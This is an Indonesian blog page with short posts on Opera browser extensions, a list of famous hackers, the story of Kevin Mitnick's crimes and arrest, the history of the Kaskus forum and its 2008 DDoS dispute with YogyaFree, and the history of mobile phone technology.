Opera memiliki fitur Opera Widgets, aplikasi web kecil yang berada di dalam Opera. Selain Widgets, "User JavaScript" dapat digunakan untuk menambah kustom JavaScript untuk halaman web.

Browser Opera dapat dikembangkan fungsinya melalui plug-in, program yang relatif kecil yang menambahkan fungsi-fungsi khusus untuk browser.Namun, Opera membatasi yang plug-in dapat lakukan dan tidak mendukung penuh pengembangan dari pihak luar. Opera melakukan hal ini sebagai jaminan kualitas, sehingga pengembang dari pihak luar tidak dapat memasukkan bug.
READ MORE

List / daftar 14 hacker terbaik dunia

Posted by Android On 0 komentar




oke ini dia daftar hacker paling terkenal dan melegenda yang ada di dunia ini.. so tetap membaca dan perhatikan..


Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.
Berikut beberapa profile 14 Hacker Terbaik Dunia untuk saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster “FBI Most Wanted”.
Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.
Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.
Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.
Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.
Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)
Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.
Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.
Merasa terganggu oleh software komersial dan dan hak cipta pribadi.
Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.
Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.

7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

8. Ian Murphy
Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya.
Hal ini mengakibatkan masyarakat pengguna telfon mendapatkan diskon “tengah malam” pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.

9. Vladimir Levin
Lulusan St. Petersburg Tekhnologichesky University.
Menipu komputer CitiBank dan meraup keuntungan 10 juta dollar.
Ditangkap Interpol di Heathrow Airport pada tahun 1995

10. Steve Wozniak
Membangun komputer Apple dan menggunakan “blue box” untukkepentingan sendiri.

11. Tsutomu Shimomura
Berhasil menangkap jejak Kevin Mitnick.

12. Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.

13. Eric Steven Raymond
Bapak hacker. Seorang hacktivist dan pelopor opensource movement.
Menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”.
Begitu fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.
Menurut Eric, “dunia mempunyai banyak persoalan menarik danmenanti untuk dipecahkan”.

14. Johan Helsingius
Mengoperasikan anonymous remailer paling populer didunia.
READ MORE
hacker mana yang tidak kenal dengan dedengkot hacker yang satu ini... sebuah legenda hidup tentang lika-liku dan kerasnya menjadi seorang cracker profesional sebelum akhirnya dia menjadi hacker.. oke ini dia cerita dan sejarahnya hanya di tutorial dan software..

Sebuah ketukan terdengar dari pintu apartemennya, Kevin Mitnick membuka pintu dan mendapati lusinan agen FBI dan penegak hukum lain sudah bersiap untuk menangkapnya. Ini adalah akhir perjalanan seorang hacker yang terpaksa buron demi menghindari hukuman penjara. Hacker yang selama masa buronannya itu telah mendapatkan status legendaris, bahkan telah tumbuh menjadi sebuah mitos yang lebih besar dari dirinya sendiri

Penangkapan yang terjadi pada 1995 itu menandai awal dari kasus penahanan yang paling kontroversial terhadap seorang pelaku kejahatan cyber. Mitnick adalah seorang penyusup pada sistem komputer menjelma sebagai America’s Most Wanted Hacker.

Kecanduan Komputer

Mitnick mudah mempelajari komputer dengan nongkrong di toko radioshack atau diperpustakaan umum, keluarganya tidak cukup berduit untuk memiliki komputer sendiri. Kesukaannya pada komputer berkembang hingga ia dewasa.

Pada periode 1990-an, Mitnick mudah sekali keluar masuk sistem komputer. Namun pada akhir 1980-an ia sebenarnya ingin meninggalkan hobynya tersebut dan mulai mencari pekerjaan yang sah. Sayangnya, sebelum ia bisa melakukan itu, pada 1987 ia tertangkap karena menyusup perusahaan Santa Cruz Organization, sebuah perusahaan piranti lunak yang terutama bergerak dibidang sistem operasi Unix. Ketika itu pengacara mitnik berhasil menurunkan tuduhan kejahatan menjadi tindakan yang kurang baik, Mitnick pun hanya di ganjar 3 tahun masa percobaan.

Tidak sampai setahun Mitnick kembali tersandung kasus hukum. Gara-garanya seorang teman yang komputernya ia gunakan untuk membobol komputer lain melaporkan Mitnick yang berwajib kali itu yang dibobol Mitnick adalah milik Digital Equipment Corporation. Setiap kali membobol komputer yang dilakukan mitnik adalah mengambil code penyusun dari piranti lunak. Kode itu kemudian dia pelajari dengan sungguh-sungguh, terkadang menemukan beberapa kelemahan didalamnya. Dalam sebuah kesempatan Mitnick hanya mengaku mengambil kode penyusun dari piranti lunak yang ia sukai atau yang menarik baginya.

Dalam kasus DEC Mitnick mendapatkan masa tahanan yang lebih berat. Ketika itu pengacaranya menyebut Mitnick memiliki, ‘kecanduan pada komputer yang tidak bisa dihentikan’. Ia diganjar 1 tahun penjara.

Di penjara Mitnick mendapatkan pengalaman yang buruk. Pada saat itu legenda Kevin Mitnick atau yang lebih dikenal juga dengan nama samaran ‘the condor’, sudah semakin membesar. Reputasinya sebagai seorang
penjahat komputer juga semakin membumbung melebihi kenyataan. Sipir di Lompoc, penjara tempat Mitnick berada, mengira Mitnick bisa menyusup kedalam komputer hanya dengan berbekal suara dan telepon. Walhasil
Mitnick bukan hanya tidak boleh menggunakan telepon, ia juga menghabiskan waktu berbulan bulan dalam ruang isolasi. Tak heran jika kemudian ia dikabarkan mengalami sedikit gangguan jiwa saat menjalani hukuman di Lompoc.

Tahun 1989 Mitnick dilepaskan dari penjara. Ia berusaha mencari pekerjaan yang resmi, namun statusnya sebagai mantan narapidana membuat Mitnick sulit mempertahankan pekerjaan. Akhirnya ia bekerja sebagai
pendulang informasi untuk kantor penyelidik kantor swasta. Tentunya ini menyeret Mitnick kembali kepada dalam dunia yang abu-abu dan hitam. Pada awal 1990-an, Mitnickpun dicari lagi oleh FBI. Kali ini takut akan masuk ruang isolasi selama bertahun-tahun, Mitnick memutuskan untuk kabur.

Hacking The Human Side

Keahlian Mitnick sebagai hacker tidak terbatas pada kemapuan teknis belaka. Ia merupakan pada kemampuan teknis belaka. Ia merupakan seorang yang memahami betul bahwa keamanan sistem komputer terdiri dari aspek kebijakan organisasi, sumber daya manusia, proses yang terlibat serta teknologi yang digunakan. Seandainya ia seoarang pahlawan super kemapuannya utama Mitnick adalah seoarang yang mempraktekan ilmu social engginering alias rekayasa sosial. Ini adalah sebuah teknik mendapatkan informasi penting, semisal password, dengan memanfaatkan kelemahan manusiawi.

Kemampuan Mitnick paling baik diilustrasikan dalam cerita berikut, cerita yang dikisahkan Mitnick sendiri pada sebuah forum online Slasdot.org

“Pada satu kesempatan, saya ditantang oleh seorang teman untuk mendapatkan nomor (telepon) Sprint Foncard-nya. Ia mengatakan akan membelikan makan malam jika saya bisa mendapatkan nomor itu. Saya tidak akan menolak makan enak, jadi saya berusahan dengan menghubungi Customer Service dan perpura-pura sebagai seorang dari bagian teknologi informasi. Saya tanyakan pada petugas yang menjawab apakah ia mengalami kesulitan pada sitem yang digunakan. Ia bilang tidak, saya tanyakan sistem yang digunakan untuk mengakses data pelanggan, saya berpura-pura ingin memverifikasi. Ia menyebutkan nama sistemnya.”

“Setelah itu saya kembali menelepon Costumer Service dan dihubungkan dengan petugas yang berbeda. Saya bilang bahwa komputer saya rusak dan saya ingin melihat data seorang pelanggan. Ia mengatakan data itu sudah berjibun pertanyaan. Siapa nama anda? Anda kerja buat siapa? Alamat anda dimana? Yah, seperti itulah. Karena saya kurang riset, saya mengarang nama dan tempat saja. Gagal. Ia bilang akan melaporkan telepon telepon ini pada keamanan.”

“Karena saya mencatat namanya, saya membawa sorang teman dan memberitahukannya tentang situasi yang terjadi. Saya meminta teman itu untuk menyamar sebagai ‘penyelidik keamaman’ untuk mencatat laporan dari petugas Customer Service dan berbicara dengan petugas tadi. Sebagai ‘penyelidik’ ia mengatakan menerima laporan adanya orang berusaha mendapatkan informasi pribadinya pelanggan. Setelah tanya jawab soal telepon tadi, ‘penyelidik menyakan apa informasi yang diminta penelepon tadi. Petugas itu bilang nomor Foncard. ‘penyelidik’ bertanya, memang berapa nomornya? Dan petugas itu memberikan nomornya. Oops. Kasus selesai”

Buron

Sebaga i buronan Mitnick berusahan sebisa mungkin untuk tidak tertangkap. Ia sering berpindah-pindah tempat tinggal dan selalu menanggalkan berbagai kebiasaan. Berbagai cara ia lakukan agar tidak terlacak oleh pengejarnya. Namun ia tidak bisa meninggalkan hobinya mengoprek komputer dan jaringan Internetnya. Bahkan beberapa keahliannya konon digunakan untuk mendapatkan identitas baru.

Legenda Mitnick selama buron dalam kurang lebih dua tahun, semakin menjadi-jadi ia menjelama sebagai ‘Ninja Cyber’ yang konon bisa membobol komputer Pentagon hanya dengan remote televisi, sebuah rumor yang melebihi cerita fiksi apapun.

Mengapa Mitnick, seorang buron dalam kasus pembobolan komputer, bisa menjadi penjahat yang paling dicari? Ini tak lepas dari peran media massa. Secara khusus adalah serangkaian artikel sensasional dari John Markoff yang dimuat di New York Times.

Markoff mengutuk Mitnick bagaikan seorang teroris. Dalam sebuah pernyataan setelah lama dibebaskan, Mitnick menyebut citra dirinya yang ditampilkan Markoff bagaikan seoarang teroris yang berusaha mengendalikan nuklir dunia. “saya seakan-akan seorang Osama bin Mitnic,” ujarnya bercanda.

Markoff menggambarkan Mitnick sebagai seorang yang mematikan, tak bisa dihentikan dan layak menjadi buronan sepuluh besar FBI maupun penegak hukum lainnya. Artikel Mafkoff, yang kadang muncul di halaman depan, menjadikan Mitnick kandidat terkuat proyek percontohan atas kejahatan cyber. Maka masa depan Mitnick dalam penjara boleh dibilang sudah dituliskan saati itu juga.

Selama menjadi buron Mitnick juga terus menjalankan aksinya. Ia membobol berbagai komputer perusahaan besar. Termasuk Sun Microsystem. Ia menggunakan, dan maksutnya disini adalah membobol rekening seorang pada layanan penyimpanan online untuk menyimpan backup dari hasil aksinya. Sebenarnya Mitnick tidak bekerja sendirian namun saat tertangkap ia tak pernah mengungkapkan siapa saja rekannya.

Salah satu korban Mitnick adalah T. Shimomura, seorang ahli komputer yang dalam beberapa tulisan di Internet diragukan kebersihannya. Ada dugaan bahwa Shimomura juga seorang hacker yang kerap melakukan perbuatan ilegal. Satu hal yang banyak disetujui adalah Shimomura memiliki sikap yang arogan dan nampaknya ingin muncul sebagai pahlawan dalam kisah perburuan Mintick.

Shimomura, Markoff dan FBI bahu membahu untuk menangkap sang buronan. Panduan dari berita sensasionalnya Mafkoff, kemampuannya hacking Shimomura dan kekuatan hukum FBI pada akhirnya melacak kediaman Mitnick.

Seperti biasanya kisah tertangkapnya seoarang buron, Mitnick melakukan ketledoran. Layanan penyimpanan yang ia gunakan rupanya memiliki program otomatis untuk mencek isi file yang disimpan. Pemilik rekening yang digunakan Mitnick mendapatkan peringatan dari sistem mengenai kapasitas berlebih. Ini adalah awal tertangkapnya Mitnick.

Mitnick mengakui bahwa dirinya ceroboh karena tidak menduga bahwa FBI, Shimomura, Markoff, dan penyedia layanan telepon selular melakukan kerja sama yang begitu erat dan terpadu.

“Operator seluler melakukan pencarian dalam database penagihan mereka terhadap dial-up ke layanan Internet Netcom POP. Ini, seperti bisa diduga, membuat mereka bisa mengidentifikasi area panggilan dan nomor MIN (mobile identification number) yang saya gunakan saat itu. Karena saya kerap berganti nomor, mereka mengawasi panggilan data apapun yang terjadi di lokasi tersebut. Lalu, dengan alat Cellscope 2000 Shimomura, melacak sinyal telepon saya hingga ke lokasi yang tepat,”Mitnick menuturkan.

Dua minggu sebelum tertangkapnya Mitnick baru pindah ke Raleigh. Lokasi baru membuat kurang waspada dan ia lupa melacak jalur dial-up yang digunakannnya. Beberapa jam sebelum tertangkapnya Mitnick baru ada sesuatu yang terjadi, pelacakan dan pengawasan sedang dilakukan terhadap jalur yang ia gunakan. Saat ia sedang berusaha melacak sejauh mana pengawasan telah dilakukan hingga siapa dilbalik pelacakan tersebut, ia mendengar ketukan pintu. Mitnick membuka pintu dan berhadapan dengan lusinan U.S Marshall dan FBI.

Empat Setengah Tahun Digantung

Setelah tertangkap Mitnick ditahan tanpa kemungkinan jaminan. Ia juga tak diajukan untuk pengadilan. Kurang lebih empat tahun ia habiskan tanpa kepastian. Hal ini benar-benar membuat Mitnick frustasi.

Selama dalam penjara FBI ia tak mendapatkan kesempatan dalam kasusnya. Bahkan Mitnick dan pengacaranya tak bisa melihat data kasus tersebut karena terdapat di laptop dan akses laptop bagi Mitnick dianggap membahayakan. Mitnick dituding bisa membuat misil meluncur hanya berbekal laptop atau telepon. Larangn itu tetap berlaku meskipun pengacaranya menggunakan laptop tanpa modem dan kemampuan jaringan apapun.

Mitnick pada akhirnya dituding menyebabkan kerugian hingga ratusan juta dollar kerugian yang menurut Mitnick tidak benar, karena perusahaan yang konon dirugikan bahkan tidak melaporkan kerugian tersebut dalam laporan tahunan mereka.

Kesepakatan akhir bagi Mitnick adalah pengakuan bersalah. Bersalah dalam kasus pembobolan komputer dan penyadapan jalur telepon. Mitnick menyerah dan mengikuti itu, dengan imbalan 4 tahun tahun lebih waktunya dalam penjara diperhitungkan sebagai mas tahanan. Total Mitnick dihukum adalah 5 tahun dipenjara , 4 tahun dalam tahanan yang terkatung-katung dan 1 tahun lagi sisanya.

Ia dibebaskan pada tahun 2000 dengan syarat tak boleh menyentuh komputer atau telepon. Pada tahun 2002 baru ia boleh menggunakan komputer tapi tidak yang tersambung ke Internet. Baru tahun 2003 ia menggunakan Internet lagi untuk pertama kalinya.

Sejak dibebaskan Mitnic berusaha untuk memperbaiki hidupnya. Ia menuliskan dua buku mengenai hacking, selain itu ia juga mendirikan perusahaan konsultan keamanan sendiri. “Hacker adalah satu-satunya kejahatan yang keahliannya bisa digunakan lagi untuk sesuatu yang etis. Saya tidak pernah melihat itu dibidang lain, misal perampokan etis,” tutur Mitnick.
READ MORE

Sejarah kaskus / history of kaskus

Posted by Android On 0 komentar
Oke kali ini saya tutorial dan software akan membahas sejarah forum terbesar di indonesia, yaitu KASKUS oke ini dia sejarahnya


Sejarah

Kaskus diciptakan tanggal 6 November 1999 oleh tiga mahasiswa asal Indonesia yaitu Andrew Darwis, Ronald, dan Budi, di Seattle, Amerika Serikat. Kaskus awalnya bertujuan sebagai forum informal mahasiswa Indonesia di luar negeri.[7] Nama "Kaskus" sendiri merupakan singkatan dari kata "kasak-kusuk".[7]

Pada bulan Agustus 2005, PC Magazine Indonesia memberikan penghargaan kepada situs Kaskus sebagai situs terbaik dan komunitas terbesar, kemudian Kaskus terpilih kembali sebagai website terbaik pilihan pembaca PC Magazine pada 2006.

Pada tanggal 23 Mei 2006 manajemen Kaskus terpaksa mengubah domain dari .com menjadi .us, karena penyebaran virus Brontok yang dibuat dengan tujuan menyerang situs-situs besar Indonesia dimana Kaskus masuk dalam target penyerangan.

Awal April 2007, manajemen Kaskus menambah 2 server baru untuk meningkatkan performance situs Kaskus (Dell Server).

Pada Juli 2008, Pengelola Kaskus akhirnya memutuskan untuk mengoperasikan server Kaskus di Indonesia. Untuk keperluan tersebut Kaskus membeli 8 server Dell PowerEdge 2950 dan dioperasikan melalui jaringan open IXP. Akibat dari ini akses Kaskus berlipat ganda dan akhirnya pengelola berencana menambahkan 8 server lagi sehingga total yang akan beroperasi di bulan September adalah 16 server.[3]

UU ITE
Kaskus sebelum mengganti tampilan.

Sebelum UU ITE diberlakukan, Kaskus memiliki dua forum kontroversial, BB17 dan Fight Club. BB17 (kependekan dari buka-bukaan 17 tahun) adalah sebuah forum khusus dewasa dimana pengguna dapat berbagi baik gambar maupun cerita dewasa. Sementara itu, Fight Club adalah forum yang dikhususkan sebagai tempat berdebat yang benar-benar bebas tanpa dikontrol. Seringkali masalah yang diperdebatkan berkaitan dengan SARA. Penghinaan terhadap suku dan agama lazim terjadi.

Setelah diberlakukannya UU ITE, Kaskus segera menutup BB17 karena bertentangan dengan UU ITE tentang penyebaran materi pornografi.[9] Fight Club diubah namanya menjadi Debate Club. Fight Club dan Debate Club pada dasarnya memiliki fungsi yang sama sebagai tempat untuk berdebat, hanya saja kontrol di Debate Club diperketat. Setiap thread baru yang dibuat user terlebih dahulu disensor oleh moderator. Bila dianggap tidak layak dan membahas SARA, maka thread itu akan dihapus.

Untuk menghapus citra negatif Kaskus sebagai media underground[10] dan situs porno[9], Kaskus mengubah tampilannya pada tanggal 17 Agustus 2008.[11] Tampilan baru kaskus dibuat penuh warna. Selain itu, Kaskus juga menambahkan fitur-fitur baru seperti blog dan Kaskus WAP.


Ada sebuah layanan terbaru dari situs Kaskus yang menyediakan sistem pembayaran secara online yang disebut KasPay.[12] Layan tersebut telah diluncurkan pada Jumat 6 November 2009,[13] pada acara Perayaan Ulang Tahun ke-10 Kaskus di Poste, The east building, Kuningan, Jakarta. Layanan transaksi ini dapat digunakan tidak hanya di Kaskus tetapi dapat digunakan terhadap situs-situs lain yang berafiliasi dengan KasPay.

Kaspay akan beroperasi layaknya E-wallet yang akan dijadikan alat untuk transaksi jual beli di seluruh transaksi online. Seluruh proses transaksi KasPay dilakukan melalui transfer sejumlah uang, sehingga aman dari modus penipuan dan pemalsuan kartu kredit dan keamanan transaksi selalu dipastikan dengan konfirmasi melalui e-mail dan catatan transaksi.
READ MORE

Sejarah Perang Ddos antara kaskus dan yogyafree

Posted by Android On 0 komentar
Ini adalah cerita lama tentang serangan Ddos antar forum terbesar di indonesia, yaitu forum comunitas persahabatan kaskus dan forum hacker terbesar di indonesia yaitu yogyafree oke ini dia sejarahnya hanya di tutorial dan software.


Pada tanggal 16—17 Mei 2008, Kaskus diserang menggunakan teknik DDoS (Distributed Denial of Service) oleh oknum yang diduga berasal dari komunitas YogyaFree.[8] Serangan ini menyebabkan database Kaskus corrupt sehingga administrator terpaksa mengunci thread-thread yang ada.

Penyerangan tersebut diduga terkait dengan peristiwa perusakan (deface) situs YogyaFree beberapa hari sebelumnya.[8] Penyerang yang mengklaim dirinya sebagai salah satu anggota Kaskus juga melontarkan celaan yang bernada mengejek di salah satu bagian forum YogyaFree. Hal tersebut membuat beberapa anggota YogyaFree berang, dan kemudian balik menyerang Kaskus dengan DDoS. Akibatnya, administrator Kaskus terpaksa mematikan server Kaskus.[8]

Perang cyber antara kedua komunitas ini akhirnya selesai ketika kedua pengelola situs menandatangani memorandum online untuk menyudahkan pertikaian di antara keduanya. Pesan tersebut dipampang selama beberapa minggu di halaman situs masing-masing.

Meskipun kerusakan yang ditimbulkan oleh serangan ini cukup berat,[8] administrator Kaskus menjanjikan bahwa Kaskus akan kembali normal pada bulan Juli 2008, seiring dengan diluncurkannya server baru Kaskus di gedung Cyber, Jakarta.[8] Namun, ia juga mengatakan bahwa data-data yang akan dimunculkan kembali adalah data yang dimuat sebelum tahun 2008, sementara data yang dibuat selama tahun 2008 tidak dapat dimunculkan kembali
READ MORE

Sejarah Handphone / History of handphone

Posted by Android On 0 komentar

Handphone adalah sebuah gadget yang rasanya wajib harus dimiliki oleh masyarakat sekarang, tidak perduli dia kaum bawah atau atas, kali ini tutorial dan software akan menyajikan tentang sejarah handphone.
Teknologi ini mulai digunakan tahun 1970 yang diawali dengan penggunaan mikroprosesor untuk teknologi komunikasi. Dan pada tahun 1971, jaringan handphone pertama dibuka di Finlandia bernama ARP. Menyusul kemudian NMT di Skandinavia pada tahun 1981 dan AMPS pada tahun 1983. Penggunaan teknologi analog pada generasi pertama menyebabkan banyak keterbatasan yang dimiliki seperti kapasitas trafik yang kecil, jumlah pelanggan yang dapat ditampung dalam satu sel sedikit, dan penggunaan spektrum frekuensi yang boros.
Di sisi lain, meningkatnya jumlah pelanggan tidak bisa ditampung generasi pertama. Selain itu, teknologi 1G hanya bisa melayani komunikasi suara, tidak seperti 2G yang bisa digunakan untuk SMS. NMT atau Nordic Mobile Telephone adalah jaringan handphone analog yang pertama kali digunakan secara internasional di Eropa Utara. Jaringan ini beroperasi pada frekuensi 450 MHz sehingga sering disebut NMT-450, ada juga NMT-900 yang beroperasi pada frekuensi 900 MHz.
Mengingat tuntutan pasar dan kebutuhan akan kualitas yang semakin baik, lahirlah teknologi generasi ke dua atau 2G. Generasi ini sudah menggunakan teknologi digital. Teknologi 2G lainnya adalah IS-95 CDMA, IS-136 TDMA dan PDC. Generasi kedua selain digunakan untuk komunikasi suara, juga bisa untuk SMS dan transfer data dengan kecepatan maksimal 9.600 bps (bit per second). Sebagai perbandingan, modem yang banyak digunakan untuk koneksi internet berkecepatan 56.000 bps (5,6 kbps). Kelebihan 2G dibanding 1G selain layanan yang lebih baik, dari segi kapasitas juga lebih besar. Karena pada 2G, satu frekuensi bisa digunakan beberapa pelanggan dengan menggunakan mekanisme Time Division Multiple Access (TDMA).
Standar teknologi 2G yang paling banyak digunakan saat ini adalah GSM (Global System for Mobile Communication), seperti yang dipakai sebagian besar handphone saat ini. GSM beroperasi pada frekuensi 900, 1800 dan 1900 MHz. GSM juga mendukung komunikasi data berkecepatan 14,4 kbps.

Sejarah

Sejarah GSM diawali dengan diadakannya konferensi pos dan telegraf di Eropa pada tahun 1982. Konferensi ini membentuk suatu study group yang bernama Groupe Special Mobile (GSM) untuk mempelajari dan mengembangkan sistem komunikasi publik di Eropa. Pada tahun 1989, tugas ini diserahkan kepada European Telecommunication Standards Institute (ETSI) dan GSM fase I diluncurkan pada pertengahan 1991.

Pada tahun 1993, sudah ada 36 jaringan GSM di 22 negara. Keunikan GSM dibanding generasi pertama adalah layanan SMS. SMS atau Short Message Service adalah layanan dua arah untuk mengirim pesan pendek sebanyak 160 karakter. GSM yang saat ini digunakan sudah memasuki fase 2.
Setelah 2G, lahirlah generasi 2,5 G yang merupakan versi lebih baik dari generasi kedua. Generasi 2,5 ini mempunyai kemampuan transfer data yang lebih cepat. Yang terkenal dari generasi ini adalah GPRS (General Packet Radio Service) dan EDGE.
Baru-baru ini, tren komunikasi seluler mulai beralih kepada generasi berikutnya yang diprediksikan akan menjadi teknologi komunikasi seluler yang menjanjikan. Generasi 3 atau 3G merupakan teknologi terbaru dalam dunia seluler. Generasi ini lebih dikenal dengan sebutan UMTS (Universal Mobile Telecommunication System) atau WCDMA (Wideband – Coded Division Multiple Access). Kelebihan generasi terbaru ini terletak pada kecepatan transfer data yang mencapai 384 kbps di luar ruangan dan 2 Mbps untuk aplikasi indoor.
Selain itu, generasi ini dapat menyediakan layanan multimedia seperti internet, video streaming, video telephony, dan lain-lain dengan lebih baik. Generasi ketiga ini menggunakan teknologi CDMA yang awalnya muncul dari teknologi militer Amerika Serikat dan dikhususkan pada standar IS-95. Beberapa paten pada jaringan-jaringan yang ada sekarang yang berbasis pada teknologi CDMA dimiliki Qualcomm Inc., sehingga pembuat peralatan membayar royalti.
Teknologi CDMA membuat kapasitas suatu sel menjadi lebih besar dibanding sistem GSM karena pada sistem CDMA, setiap panggilan komunikasi memiliki kode-kode tertentu sehingga memungkinkan banyak pelanggan menggunakan sumber radio yang sama tanpa terjadinya gangguan interferensi dan cross talk. Sumber radio dalam hal ini adalah frekuensi dan time slot yang disediakan untuk tiap sel.
Sistem komunikasi wireless berbasis CDMA pertama kali digunakan pada tahun 1995 dan sampai sekarang, CDMA merupakan saingan utama dari sistem GSM di banyak negara. Pada tahun 1999, the International Telecommunication Union (ITU) memilih CDMA sebagai standar teknologi untuk generasi ketiga (3G). Varian CDMA yang banyak digunakan adalah WCDMA dan TD-SCDMA.
Pada bulan Mei 2001 sudah terdapat 35 juta pelanggan CDMA di seluruh dunia. Dan pada tahun 2003, terdapat 100 juta pelanggan yang menggunakan CDMA di seluruh dunia. Kelebihan utama yang dimiliki generasi ketiga adalah kemampuan transfer data yang cepat atau memiliki bit rate yang tinggi.
Tingginya bit rate yang dimiliki menyebabkan banyak operator CDMA dapat menyediakan berbagai aplikasi multimedia yang lebih baik dan bervariasi, dan menjadi daya tarik tersendiri bagi pelanggan. Bayangkan saja, hanya dengan sebuah handphone, kita memiliki fasilitas kamera, video, komputer, stereo dan radio. Selain itu, berbagai fasilitas hiburan pun bisa dinikmati seperti video klip, keadaan lalu lintas secara real time, teleconference, bahkan sekadar memesan tempat di restoran, cukup dengan menekan tombol di handphone.
Ketika kita duduk di rumah pun, kita masih bisa melakukan berbagai hal tanpa harus keluar ruangan, seperti mencek saldo bank, membayar SPP untuk kuliah anak-anak, memesan makanan dan lain-lain. Itu semua bukan hal yang mustahil bagi generasi ketiga.
Dalam jangka panjang, CDMA dan teknologi-teknologi lainnya seperti GSM akan dibandingkan berdasarkan pada biaya total per pelanggan dari jaringan infrastruktur dan harga pesawat telefon.Dengan 3G, komunikasi murah dan berkualitas bukan impian belaka.
READ MORE